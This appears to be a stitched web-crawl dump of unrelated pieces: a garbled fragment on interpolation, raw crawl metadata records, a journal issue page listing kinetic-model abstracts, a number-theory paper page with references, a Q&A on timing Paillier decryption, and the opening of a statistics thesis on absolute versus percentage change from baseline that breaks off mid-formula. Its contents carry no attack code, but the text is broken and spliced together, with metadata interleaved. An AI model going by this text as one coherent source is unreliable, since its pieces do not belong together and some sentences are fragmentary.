to the use of elementary arithmetic operations +,−,×,÷ With these operations we can only evaluate polynomials and rational functions (polynomial divided by polynomials). interpolation provides an explicit solution of the interpolating conditions. Newton's divided difference formula ii. x y 1 12 3 14 4 24 5 40 Table 11 Divided difference table of the quadratic pattern for Table 10. you are asked to calculate the specific heat of water at 61 ° C. The Hermite interpolation based Newton's polynomials is again carried out to the same function used before."
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.8801193,"math_prob":0.9534011,"size":37299,"snap":"2019-35-2019-39","text_gpt3_token_len":7623,"char_repetition_ratio":0.25555703,"word_repetition_ratio":0.3564234,"special_character_ratio":0.19158691,"punctuation_ratio":0.10262455,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9996283,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-08-24T00:13:03Z\",\"WARC-Record-ID\":\"<urn:uuid:6301071c-5d57-439f-9fee-4840469e8903>\",\"Content-Length\":\"39383\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c36b1db6-d0e9-4dc4-a091-08eba030310e>\",\"WARC-Concurrent-To\":\"<urn:uuid:c54d2010-b76c-4ca3-9a08-24ecdf0227be>\",\"WARC-IP-Address\":\"68.65.122.207\",\"WARC-Target-URI\":\"http://paksebali.com/a73g/doppy\",\"WARC-Payload-Digest\":\"sha1:W45L3BXHG5OTJNET7KIQAQOBPOHAGXN4\",\"WARC-Block-Digest\":\"sha1:P6YL73JITNRCUETDJOMOIUF2CTU5DN2U\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-35/CC-MAIN-2019-35_segments_1566027319155.91_warc_CC-MAIN-20190823235136-20190824021136-00446.warc.gz\"}"} |
https://www.aimsciences.org/journal/1937-5093/2020/13/2 | [
"",
null,
"",
null,
"",
null,
"",
null,
"",
null,
"ISSN:\n1937-5093\n\neISSN:\n1937-5077\n\n## Journal Home\n\n• Open Access Articles",
null,
"All Issues\n\n## Kinetic & Related Models\n\nApril 2020 , Volume 13 , Issue 2\n\nSelect all articles\n\nExport/Reference:\n\n2020, 13(2): 211-247 doi: 10.3934/krm.2020008 +[Abstract](1403) +[HTML](137) +[PDF](533.06KB)\nAbstract:\n\nWe present a stochastic version of the Cucker-Smale flocking dynamics described by a system of \\begin{document}$N$\\end{document} interacting particles. The velocity aligment of particles is purely discontinuous with unbounded and, in general, non-Lipschitz continuous interaction rates. Performing the mean-field limit as \\begin{document}$N \\to \\infty$\\end{document} we identify the limiting process with a solution to a nonlinear martingale problem associated with a McKean-Vlasov stochastic equation with jumps. Moreover, we show uniqueness and stability for the kinetic equation by estimating its solutions in the total variation and Wasserstein distance. Finally, we prove uniqueness in law for the McKean-Vlasov equation, i.e. we establish propagation of chaos.\n\n2020, 13(2): 249-277 doi: 10.3934/krm.2020009 +[Abstract](1201) +[HTML](141) +[PDF](1670.08KB)\nAbstract:\n\nMotivated by modeling transport processes in the growth of neurons, we present results on (nonlinear) Fokker-Planck equations where the total mass is not conserved. This is either due to in- and outflow boundary conditions or to spatially distributed reaction terms. We are able to prove exponential decay towards equilibrium using entropy methods in several situations. As there is no conservation of mass it is difficult to exploit the gradient flow structure of the differential operator which renders the analysis more challenging. In particular, classical logarithmic Sobolev inequalities are not applicable any more. Our analytic results are illustrated by extensive numerical studies.\n\n2020, 13(2): 279-307 doi: 10.3934/krm.2020010 +[Abstract](1178) +[HTML](143) +[PDF](5653.39KB)\nAbstract:\n\nWe study spatially non-homogeneous kinetic models for vehicular traffic flow. Classical formulations, as for instance the BGK equation, lead to unconditionally unstable solutions in the congested regime of traffic. We address this issue by deriving a modified formulation of the BGK-type equation. The new kinetic model allows to reproduce conditionally stable non-equilibrium phenomena in traffic flow. In particular, stop and go waves appear as bounded backward propagating signals occurring in bounded regimes of the density where the model is unstable. The BGK-type model introduced here also offers the mesoscopic description between the microscopic follow-the-leader model and the macroscopic Aw-Rascle and Zhang model.\n\n2020, 13(2): 309-344 doi: 10.3934/krm.2020011 +[Abstract](1440) +[HTML](138) +[PDF](619.95KB)\nAbstract:\n\nWe consider the Fokker-Planck equation with an external magnetic field. Global-in-time solutions are built near the Maxwellian, the global equilibrium state for the system. Moreover, we prove the convergence to equilibrium at exponential rate. The results are first obtained on spaces with an exponential weight. Then they are extended to larger functional spaces, like certain Lebesgue spaces with polynomial weights and modified weighted Sobolev spaces, by the method of factorization and enlargement of the functional space developed in [Gualdani, Mischler, Mouhot, 2017].\n\n2020, 13(2): 345-371 doi: 10.3934/krm.2020012 +[Abstract](1385) +[HTML](162) +[PDF](435.49KB)\nAbstract:\n\nThis paper is devoted to Fokker-Planck and linear kinetic equations with very weak confinement corresponding to a potential with an at most logarithmic growth and no integrable stationary state. Our goal is to understand how to measure the decay rates when the diffusion wins over the confinement although the potential diverges at infinity. When there is no confinement potential, it is possible to rely on Fourier analysis and mode-by-mode estimates for the kinetic equations. Here we develop an alternative approach based on moment estimates and Caffarelli-Kohn-Nirenberg inequalities of Nash type for diffusion and kinetic equations.\n\n2020, 13(2): 373-400 doi: 10.3934/krm.2020013 +[Abstract](1016) +[HTML](135) +[PDF](414.61KB)\nAbstract:\n\nWe are concerned with the global existence and long time behavior of the solutions to the ES-FP model for diatomic gases proposed in . The global existence of the solutions for this model near the global Maxwellian is established by nonlinear energy method based on the macro-micro decomposition. An algebraic convergence rate in time of the solutions to the equilibrium state is obtained by constructing the compensating function. Since the density distribution function \\begin{document}$F(t, x, v, I)$\\end{document} also contains energy variable \\begin{document}$I$\\end{document}, we derive more general Poincaré inequality including variables \\begin{document}$v, I$\\end{document} on \\begin{document}$\\mathbb{R}^3\\times \\mathbb{R}^+$\\end{document} to establish the coercivity estimate of the linearized operator.\n\n2020, 13(2): 401-434 doi: 10.3934/krm.2020014 +[Abstract](1416) +[HTML](156) +[PDF](482.03KB)\nAbstract:\n\nWe study the asymptotic behavior of a second-order swarm model on the unit sphere in both particle and kinetic regimes for the identical cases. For the emergent behaviors of the particle model, we show that a solution to the particle system with identical oscillators always converge to the equilibrium by employing the gradient-like flow approach. Moreover, we establish the uniform-in-time \\begin{document}$\\ell_2$\\end{document}-stability using the complete aggregation estimate. By applying such uniform stability result, we can perform a rigorous mean-field limit, which is valid for all time, to derive the Vlasov-type kinetic equation on the phase space. For the proposed kinetic equation, we present the global existence of measure-valued solutions and emergent behaviors.\n\n2019 Impact Factor: 1.311"
] | [
null,
"https://www.aimsciences.org:443/style/web/images/white_google.png",
null,
"https://www.aimsciences.org:443/style/web/images/white_facebook.png",
null,
"https://www.aimsciences.org:443/style/web/images/white_twitter.png",
null,
"https://www.aimsciences.org:443/style/web/images/white_linkedin.png",
null,
"https://www.aimsciences.org/fileAIMS/journal/img/cover/Cover1_KRM_5-1_2012.jpg",
null,
"https://www.aimsciences.org:443/style/web/images/OA.png",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.9046573,"math_prob":0.9686865,"size":3577,"snap":"2020-45-2020-50","text_gpt3_token_len":712,"char_repetition_ratio":0.10299468,"word_repetition_ratio":0.0,"special_character_ratio":0.1803187,"punctuation_ratio":0.076794654,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97816646,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-12-01T08:51:06Z\",\"WARC-Record-ID\":\"<urn:uuid:3488e302-9e5c-41b9-b4df-65bce0d6cbbb>\",\"Content-Length\":\"80772\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c7d3fe2a-cc84-4938-a68e-c43842f0ff2d>\",\"WARC-Concurrent-To\":\"<urn:uuid:f0d72b1a-ab35-44d6-9448-89878d12e2fb>\",\"WARC-IP-Address\":\"107.161.80.18\",\"WARC-Target-URI\":\"https://www.aimsciences.org/journal/1937-5093/2020/13/2\",\"WARC-Payload-Digest\":\"sha1:BB5JWZRH64TGZY7YTRNZZHKSOHZ6BCZI\",\"WARC-Block-Digest\":\"sha1:FFONG57OTCUMNF4IIPDXP5YT36AZR4BQ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-50/CC-MAIN-2020-50_segments_1606141672314.55_warc_CC-MAIN-20201201074047-20201201104047-00235.warc.gz\"}"} |
https://nntdm.net/volume-27-2021/number-3/113-118/ | [
"# A Diophantine equation about polygonal numbers\n\nYangcheng Li\nNotes on Number Theory and Discrete Mathematics\nPrint ISSN 1310–5132, Online ISSN 2367–8275\nVolume 27, 2021, Number 3, Pages 113—118\nDOI: 10.7546/nntdm.2021.27.3.113-118\n\n## Details\n\n### Authors and affiliations\n\nYangcheng Li",
null,
"School of Mathematics and Statistics, Changsha University of Science and Technology,\nChangsha, 410114, People’s Republic of China\n\n### Abstract\n\nIt is well known that the number",
null,
"is called the",
null,
"-th",
null,
"-gonal number, where",
null,
". Many Diophantine equations about polygonal numbers have been studied. By the theory of Pell equation, we show that if",
null,
"is a positive integer but not a perfect square,",
null,
"",
null,
",",
null,
"and the Diophantine equation",
null,
"has a nonnegative integer solution",
null,
", then it has infinitely many positive integer solutions of the form",
null,
", where",
null,
"and",
null,
",",
null,
".\n\n### Keywords\n\n• Polygonal number\n• Diophantine equation\n• Pell equation\n• Positive integer solution\n\n• 11D09\n• 11D72\n\n### References\n\n1. Bencze, M. (2012). Proposed problem 7508. Octogon Mathematical Magazine, 13(1B), 678.\n2. Cohen, H. (2007). Number Theory, Vol. I: Tools and Diophantine Equations, Graduate Texts in Mathematics.\n3. Deza, E., & Deza, M. M. (2012). Figurate Numbers, World Scientific.\n4. Dickson, L. E. (1934). History of the Theory of Numbers, Vol. II: Diophantine Analysis, Dover Publications.\n5. Guan, X. G. (2011). The squares with the form",
null,
". Natural Science Journal of Ningxia Teachers University, 32(3), 97–107.\n6. Guy, R. K. (2007). Unsolved Problems in Number Theory. Springer-Verlag.\n7. Hamtat, A., & Behloul, D. (2017). On a Diophantine equation on triangular numbers. Miskolc Mathematical Notes, 18(2), 779–786.\n8. Hu, M. J. (2013). The positive integer solutions of the Diophantine equation",
null,
". Journal of Zhejiang International Studies University, 4, 70–76.\n9. Jiang, M., & Li, Y. C. (2020). The linear combination of two polygonal numbers is a perfect square. Notes on Number Theory and Discrete Mathematics, 26(2), 105–115.\n10. Le, M. H. (2007). The squares with the form",
null,
". Natural Science Journal of Hainan University, 25(1), 13–14.\n11. Li, Y. C. (2020). Linear combinations of two polygonal numbers that take infinitely often a square value. Integers, 20, Article #A100.\n12. Peng, J. Y. (2019). The linear combination of two triangular numbers is a perfect square. Notes on Number Theory and Discrete Mathematics, 25(3), 1–12.\n13. Pla, J. (2014). On some subsets of the rational solutions of the equations",
null,
". The Mathematical Gazette, 98(543), 424–428.\n14. Sastry, K. R. S. (1993). A triangular triangle problem. Crux Mathematicorum, 19(8), 219–221.\n15. Sastry, K. R. S. (1993). Pythagorean triangles of the polygonal numbers. Mathematics and Computer Education Journal, 27(2), 135–142.\n16. Scheffold, E. (2001). Pythagorean triples of polygonal numbers. The American Mathematical Monthly, 108(3), 257–258.\n\n## Cite this paper\n\nLi, Y. (2021). A Diophantine equation about polygonal numbers. Notes on Number Theory and Discrete Mathematics, 27(3), 113-118, doi: 10.7546/nntdm.2021.27.3.113-118."
] | [
null,
"http://nntdm.net/wp-content/uploads/img/env.jpg",
null,
"https://nntdm.net/wp-content/ql-cache/quicklatex.com-b62d85daba5aa881da8f382852a1cec3_l3.png",
null,
"https://nntdm.net/wp-content/ql-cache/quicklatex.com-ede05c264bba0eda080918aaa09c4658_l3.png",
null,
"https://nntdm.net/wp-content/ql-cache/quicklatex.com-3422b6bb5c160593658b7c39425d9880_l3.png",
null,
"https://nntdm.net/wp-content/ql-cache/quicklatex.com-86c54afc7f300921f49fe53f9f030ea3_l3.png",
null,
"https://nntdm.net/wp-content/ql-cache/quicklatex.com-465c0e94b39c16c57d1d04daa2b5a701_l3.png",
null,
"https://nntdm.net/wp-content/ql-cache/quicklatex.com-d05330f979ba3bf21d86111dec32a386_l3.png",
null,
"https://nntdm.net/wp-content/ql-cache/quicklatex.com-752f01485ab4707eafff42df40060960_l3.png",
null,
"https://nntdm.net/wp-content/ql-cache/quicklatex.com-ab7d2426fb8934b6d2d84669992b2c61_l3.png",
null,
"https://nntdm.net/wp-content/ql-cache/quicklatex.com-723e7871609fedcaf225f0d11caa6f41_l3.png",
null,
"https://nntdm.net/wp-content/ql-cache/quicklatex.com-cc96e3dc395805e68185cebdcac591da_l3.png",
null,
"https://nntdm.net/wp-content/ql-cache/quicklatex.com-e05c584c11e5ab7919d25d21cbdc9562_l3.png",
null,
"https://nntdm.net/wp-content/ql-cache/quicklatex.com-a541207477e569617f2dee640a7721c6_l3.png",
null,
"https://nntdm.net/wp-content/ql-cache/quicklatex.com-6bda7d40681f03e5748b538b6820e052_l3.png",
null,
"https://nntdm.net/wp-content/ql-cache/quicklatex.com-dd73c30a0614e8c24024dbe2c0c8c2fb_l3.png",
null,
"https://nntdm.net/wp-content/ql-cache/quicklatex.com-ddece2380b1a41ea815077b1c51a0001_l3.png",
null,
"https://nntdm.net/wp-content/ql-cache/quicklatex.com-d94d94f6b2a0ac0707f2516bbf82759c_l3.png",
null,
"https://nntdm.net/wp-content/ql-cache/quicklatex.com-33d1c78be1f37aac56002b9edb52d9e7_l3.png",
null,
"https://nntdm.net/wp-content/ql-cache/quicklatex.com-35af76d8162bd7137eb6605491ed995b_l3.png",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.6690421,"math_prob":0.9550161,"size":3031,"snap":"2023-40-2023-50","text_gpt3_token_len":883,"char_repetition_ratio":0.14271556,"word_repetition_ratio":0.089324616,"special_character_ratio":0.33025405,"punctuation_ratio":0.26833072,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9966514,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38],"im_url_duplicate_count":[null,null,null,5,null,null,null,null,null,5,null,5,null,5,null,5,null,5,null,5,null,5,null,5,null,5,null,5,null,5,null,2,null,2,null,2,null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-11-30T10:58:10Z\",\"WARC-Record-ID\":\"<urn:uuid:50c9d447-3ce5-4761-871f-4adbcf92e0e8>\",\"Content-Length\":\"38519\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:da857857-ea23-4728-99f8-695e1ef089f3>\",\"WARC-Concurrent-To\":\"<urn:uuid:9f24510e-1684-4a63-8a4d-88e954f4f2ec>\",\"WARC-IP-Address\":\"195.96.253.115\",\"WARC-Target-URI\":\"https://nntdm.net/volume-27-2021/number-3/113-118/\",\"WARC-Payload-Digest\":\"sha1:QWUJA5ZRLAPYYVLNIRR5MHWLNOOZZHBV\",\"WARC-Block-Digest\":\"sha1:IKASC5PH5AV23XD2A6II6E2LXQN4H3AP\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679100184.3_warc_CC-MAIN-20231130094531-20231130124531-00411.warc.gz\"}"} |
https://crypto.stackexchange.com/questions/87785/evaluate-the-time-of-paillier-decryption | [
"# Evaluate the time of Paillier decryption\n\nIf I have 4 kilobytes of Paillier encrypted data, how can I know the time needed to decrypt it?\n\n• Simple tining is the time command in Linux\\Unix and see Chrono for C++ Jan 25 at 18:31\n• I’m voting to close this question because has nothing to do with Cryptography.SE Jan 25 at 18:31\n• I know time commands but i was hoping to see if someone has a answer referenced by a research paper. I found some work on this but with bigger data sizes.\n– Mimi\nJan 25 at 21:03\n• Do you want to compare it to something else? Jan 25 at 21:59\n• I am comparing my algorithm that uses Paillier for encryption/decryption to another algorithm. So I am not comparing it to another encryption scheme.\n– Mimi\nJan 25 at 22:30\n\nYou need to know\n\n• The size $$s$$ of the public modulus $$n$$ in bits.\n• The number $$c$$ of cryptograms.\n• If the code uses the CRT, or not; and in the affirmative, the number $$k$$ of prime factors in $$n$$ (usually $$k=2$$ for $$n=p\\,q$$, with $$p$$ and $$q$$ distinct primes).\n• And of course, some benchmark of the code and hardware!\n\nEach cryptogram is $$2s$$-bit, thus for 4kbyte ciphertext (at most 2kbyte plaintext) $$c\\,s\\le2^{14}$$. The largest range/safer/slower for 4kbyte ciphertext is $$c=1$$, $$s=2^{14}$$ (that is 16384-bit $$n$$, which is rather large).\n\nAs a rough approximation, using the same computation means and $$k=2$$, Pailler decryption with CRT for $$s$$-bit public modulus $$n$$ ($$2s$$-bit cryptogram) is about as fast as RSA decryption with CRT for $$2s$$-bit modulus. Not using CRT in Pailler causes a moderate slowdown (at most a factor of $$2$$), less than in RSA. Time is proportional to $$c$$, and often normalized for $$c=1$$ in RSA benchmarks.\n\nExtremely roughly, Pailler decryption for $$c=1$$ is like 5 times slower than RSA decryption at equal size of $$n$$ and other stuff.\n\nLarge savings are possible by increasing $$k$$, like in multiprime-RSA.\n\n• @fgrieu- Thanks, will try to work it out using your hints.\n– Mimi\nJan 27 at 20:44"
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.84899396,"math_prob":0.9984413,"size":2099,"snap":"2021-43-2021-49","text_gpt3_token_len":614,"char_repetition_ratio":0.11885442,"word_repetition_ratio":0.011494253,"special_character_ratio":0.2858504,"punctuation_ratio":0.1031175,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9998971,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-24T21:30:08Z\",\"WARC-Record-ID\":\"<urn:uuid:39f1e0ff-31df-4071-b1b2-d96bd3240a83>\",\"Content-Length\":\"172397\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:a7f75e45-162a-42b0-94fd-a0eb06b5fd91>\",\"WARC-Concurrent-To\":\"<urn:uuid:dab60108-b0d9-49df-ac91-4295edcba2f2>\",\"WARC-IP-Address\":\"151.101.65.69\",\"WARC-Target-URI\":\"https://crypto.stackexchange.com/questions/87785/evaluate-the-time-of-paillier-decryption\",\"WARC-Payload-Digest\":\"sha1:BTMLGUW2QPYVWX2G43ASFNL6RVA3XLU5\",\"WARC-Block-Digest\":\"sha1:HMRMYPR2OTN7353NDUCADZ2Y4ZV3SR47\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323587606.8_warc_CC-MAIN-20211024204628-20211024234628-00318.warc.gz\"}"} |
https://www.nagwa.com/en/lessons/109140687920/ | [
"# Lesson: Multiplying a Two-Digit Number by a One-Digit Number: Column Method with Regrouping Mathematics • 4th Grade\n\nIn this lesson, we will learn how to use the standard algorithm to multiply a two-digit number by a one-digit number for calculations where there is regrouping."
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.76454055,"math_prob":0.99231327,"size":342,"snap":"2020-45-2020-50","text_gpt3_token_len":88,"char_repetition_ratio":0.1183432,"word_repetition_ratio":0.0,"special_character_ratio":0.25730994,"punctuation_ratio":0.11764706,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99931717,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-12-03T17:08:37Z\",\"WARC-Record-ID\":\"<urn:uuid:118a509c-35d4-464e-a956-a503d0c898c9>\",\"Content-Length\":\"34770\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:979800cf-f96b-49c3-9d33-4d913f1efaa4>\",\"WARC-Concurrent-To\":\"<urn:uuid:2db75c3e-3838-44ec-93b8-6a8f85b1efd3>\",\"WARC-IP-Address\":\"52.44.123.63\",\"WARC-Target-URI\":\"https://www.nagwa.com/en/lessons/109140687920/\",\"WARC-Payload-Digest\":\"sha1:PTZGHCLL4UKKYS4WGBYPRBJIG7F4IANA\",\"WARC-Block-Digest\":\"sha1:HCRS7ABQ3JKIYQFWULGN3NRH77V3ZNCL\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-50/CC-MAIN-2020-50_segments_1606141729522.82_warc_CC-MAIN-20201203155433-20201203185433-00053.warc.gz\"}"} |
http://spotidoc.com/doc/196882/how-to-analyze-change-from-baseline--absolute-or-percenta. | [
"",
null,
"# How to Analyze Change from Baseline: Absolute or Percentage Change?\n\n```D-level Essay in Statistics 2009\nHow to Analyze Change from Baseline:\nAbsolute or Percentage Change?\nExaminer:\nLars Rönnegård\nAuthor:\nLing Zhang\nKun Han\nSupervisor:\nJohan Bring\nCoCo-supervisor:\nRichard Stridbeck\nDate:\nJune 10, 2009\nHögskolan Dalarna\n781 88 Borlänge\nTel vx 023-778000\nHow to Analyze Change from Baseline:\nAbsolute or Percentage Change?\nJune 10, 2009\nABSTRACT\nIn medical studies, it is common to have measurements before and after some medical interventions. How to measure\nthe change from baseline is a common question met by researchers. Two of the methods often used are absolute change\nand percentage change. In this essay, from statistical point of view, we will discuss the comparison of the statistical power\nbetween absolute change and percentage change. What’s more, a rule of thumb for calculation of the standard deviation of\nabsolute change is checked in both theoretical and practical way. Simulation is also used to prove both the irrationality of the\nconclusion that percentage change is statistical ine¢ cient and the nonexistence of the rule of thumb for percentage change.\nSome recommendations about how to measure change are put forward associated with the research work we have done.\nKey Words: Absolute Change, Percentage Change, Baseline, Follow-up, Statistical Power, Rule of Thumb.\nchange to evaluate the change of weight. Neovius (2007) also\nchose absolute change as the change measurement in their\nobesity research, while Kim (2009) chose percentage change\n1. Introduction\nto measure the fat lost in di¤erent part of an obese man’s\nbody in a weight loss program. In a cystic …brosis clinical\nn medical studies, a common way to measure treatment study, Lavange (2007) used percentage change as well. We\ne¤ect is to compare the outcome of interest before treat- see that, both of the two methods have been used in di¤erent\nment with that after treatment. The measurements before kinds of clinical studies.\nand after treatment are known as the baseline (B) and the\nThe properties of absolute change and percentage change\nfollow-up (F ), respectively. How to measure the change from\nhave\nbeen discussed by Tönqvist (1985). From his point of\nbaseline is a common question met by researchers. There\nview,\none of the advantages of percentage change is that perare many methods that can be used as the measure of di¤ercentage\nchange is independent of the unit of measurement.\nence. Two of them, which are used in a lot of clinical studies,\nFor\ninstance,\na man who weighs 100 Kg lost 10% of weight\nare absolute change (C = B F ) and percentage change\nafter\na\ntreatment,\ni.e. 10 Kg. Equivalently, he lost 22.05\n(P = (B F ) B). In di¤erent books and articles, absolute\npounds\n(1Kg\n=\n2:2046\nPounds). 10 Kg and 22.05 pounds are\nchange may also be called change, while percentage change is\nessentially\nthe\nsame\nweight,\nbut the absolute change scores\nalso called relative change.\nare\ndi¤erent.\nHowever,\nno\nmatter\nwhat the unit of measureThere is a simple example that will show us the di¤erence\nment\nis,\nthe\npercentage\nchange\nis\n10% all the time. More\nbetween absolute change and percentage change more clearly:\ndetails\nthe\nof\nabsolute\nchange can be found\nTwo obese men A and B participate in a weight loss program.\nin\nthe\narticle\nof\nTönqvist\n(1985).\nAlthough\nthere are many\nTheir weights at the beginning of the program are 150 Kg and\nfor\nthe\ntwo\nchange\nmeasurement\nmethods, Tön100 Kg, respectively. When they …nish the program, the man\nqvist\n(1985)\ndid\nnot\ngive\nany\nrecommendations\nA who weighs 150 Kg lost 15 Kg, while another man lost 10\nmake\na\nchoice\nbetween\nabsolute\nchange\nand\npercentage\nchange\nKg. From the example, we see that, the man A lost 5 Kg more\nbased\non\nthese\nproperties.\nthan that the man B, but the percent of weight they lost are\n10% in both cases. We want to know, which change measureIn other literatures, several suggestions about which\nment is best to show the treatment e¤ect of the weight loss method to choose are mentioned. Vickers (2001) suggested\nprogram.\navoiding using percentage change. That is because he comIn di¤erent clinical studies, either absolute change or per- pared the statistical power of di¤erent methods by doing\ncentage change may be chosen. In the study of healthy dieting a simulation and concluded that percentage change from\nand weight control, Waleekhachonloet (2007) used absolute baseline is statistically ine¢ cient. Kaiser (1989) also gave\nI\n1\nHow to Analyze Change from Baseline: Absolute or Percentage Change?\nsome recommendations for making a choice between absolute\nchange and percentage change. He suggested using the change\nmeasurement that has less correlation with baseline scores. A\ntest statistic developed by Kaiser (1989) was also derived, i.e.\nthe ratio of the maximum likelihood of absolute change to\nthat of percentage change. The absolute change is recommended if the value of the test statistic is larger than one,\nwhile percentage change is preferred when it is less than one.\nThat is, a simple rule helping researchers to make a choice\nquickly.\nActually, the primary consideration for choosing a change\nmeasurement method is di¤erent from di¤erent points of view.\nFrom a clinical point of view, we prefer to use a change measurement that may show the health-improvement for the patients in a more observable way. For example, in study of\nasthma, the primary outcome variable is often FEV (Forced\nExpiratory Volume L/s). The e¢ ciency of a treatment is\nevaluated by calculating the percentage change in FEV from\nbaseline. In hypertension studies, it is common to use the absolute change in blood pressure instead of percentage change.\nFrom statistical point of view, we prefer the method which\nhas the highest statistical power as Vickers (2001) did.\nAnother issue concerned by researchers is the standard\ndeviation of the treatment e¤ect (change scores). For two\nmedical interventions that may lead to the same expected\nchange, the e¤ect of the intervention that has a smaller standard deviation seems more stable and e¤ective. And clinicians may always prefer that medical intervention. Since it\nis not practical for researchers to get all the interested experimental datasets which recorded the details of baseline and\nfollow-up scores for p\neach patient, there is a rule of thumb\n21 . It may help calculating the stanSD (C)\nSD (B)\ndard deviation of change scores from the standard deviation\nof baseline scores.\nThe aim of this essay is to show, the statistical e¢ ciency\nof percentage change under some conditions in contrast with\nVickers’(2001) conclusion, and the rationality of the rule of\nthumb. The essay is organized as follows. The second section\nis the comparison of the statistical power of absolute change\nand percentage change by constructing a test statistic under\ncertain distribution assumption. In the third section, the rationality of rule of thumb is discussed in a theoretical way.\nSimulations of some of the issues discussed in section two and\nthree are carried out in the fourth section. The …fth section\nis an empirical investigation of the usefulness of the rule of\nthumb by using some real datasets. Finally, in the discussion\nsection, we discuss the results got from the previous sections,\nand give some suggestions.\n1 Personal\n2 However,\n2. Comparison of the statistical\npower of absolute change and\npercentage change\nI\nn clinical research, it is common to test whether there is a\ntreatment e¤ect after a medical intervention. In order to\ntest the treatment e¤ect, it’s necessary to choose a suitable\nmeasurement of the di¤erence between baseline and follow-up\nscores.\nFrom a statistical point of view, an important criterion for\na good statistical method is high statistical power. Therefore,\nfrom the two common change measurement methods, absolute\nchange and percentage change, the one with a higher statistical power will be preferred.\n2.1 Statistical Power\nAccording to the hypothesis testing theory, statistical power\nis the probability that a test reject the false null hypothesis.\nThe de…nition of statistical power can be expressed as\nequation (1).\nStatistical power = P (reject H0 j H0 is False)\n(1)\nwhere H0 is the null hypothesis.\nIn a t-test, equation (1) can be rewritten as equation (2).\nStatistical power = P (reject H0 j H0 is False)\n= P jtj > t =2\n= P (pt < )\n(2)\nwhere t =2 is the t-value under the signi…cant level in a\ntwo-side t-test, and pt is the p-value of the t-test.\nFrom expression (2), we may see that the larger the expected absolute value of the t-statistic is, the higher the statistical power will be.2 Equivalently, the smaller the expected\np-value is, the higher the statistical power will be. Therefore,\nfrom di¤erent measurement methods, we will choose the one\nthat has a larger expected absolute value of t-statistic or a\nsmaller expected p-value.\n2.2 A Clinical Example of Blood Pressure\nDrug Experiment\nTo easily interpret the di¤erence of two measurement methods, an example from a clinical trial is shown in Table 1. In\nthe table, there are the records of the supine systolic blood\npressures (in mmHg) for 5 patients before and after taking\nthe drug captopril.\nLet (Bj ; Fj ) denote a baseline/follow-up pair of scores for\npatient j in the treatment group, j = 1; 2;\n; n. Then, we\ncommunication Prof. Johan Bring, E-mail: [email protected]\nit must be emphasized that, in this essay, “statistical power” actually means something slightly di¤erent from this.\nZhang, L. and Han, K. (2009)\n2/17\nHow to Analyze Change from Baseline: Absolute or Percentage Change?\ncan get absolute change Cj = Bj Fj and percentage change\nPj = (Bj Fj ) Bj for patient j by calculating from the\nbaseline Bj and follow-up Fj scores immediately.\nIn this example, j is the patients’ ID number, and here\nn = 5. In columns 2 and 3, there are baseline and followup scores for each patient. Absolute change and percentage\nchange that calculated from baseline and follow-up scores are\nshown in column 4 and 5, respectively.\nTable 1. Supine systolic blood pressure (in mmHg) for 5\npatients with moderate essential hypertension, immediately\nbefore and after taking the drug captopril3\nID Baseline Follow-up Absolute Percentage(%)\n(j)\n(Bj )\n(Fj )\n(Cj )\n(Pj )\n1\n210\n201\n9\n4.3\n2\n169\n165\n4\n2.4\n3\n187\n166\n21\n11.2\n4\n160\n157\n3\n1.9\n5\n167\n147\n20\n12.0\n(Cj = Bj Fj ; Pj = 100 (Bj Fj ) Bj )\nabsolute change and percentage change are asymptotic normally distributed, i.e.\nC\nP\nN\nN\nC;\nP;\n2\nC\n2\nP\nwhere C and C are the mean and the standard deviation\nof C, P and P are the mean and the standard deviation of\nP , respectively.\nIn this case, t-test can be used for both absolute change\nand percentage change. For absolute change, the null hypothN C ; 2C , we get\nesis of t-test is H0 : C = 0. From C\nthe t-statistic for an absolute change t-test is\nC 0\nC\n=\n(3)\nbC\nbC\nwhere bC is an estimate of the standard deviation of absolute change.\nSimilarly, in the percentage case, the null hypothesis of\nt-test is H0 : P = 0 . From P\nN P ; 2P , we get the\nt-statistic for a percentage change t-test is\ntC =\nFrom Table 1, we see that there is a decreasing e¤ect for\nP 0\nP\ntP =\n=\n(4)\nthe blood 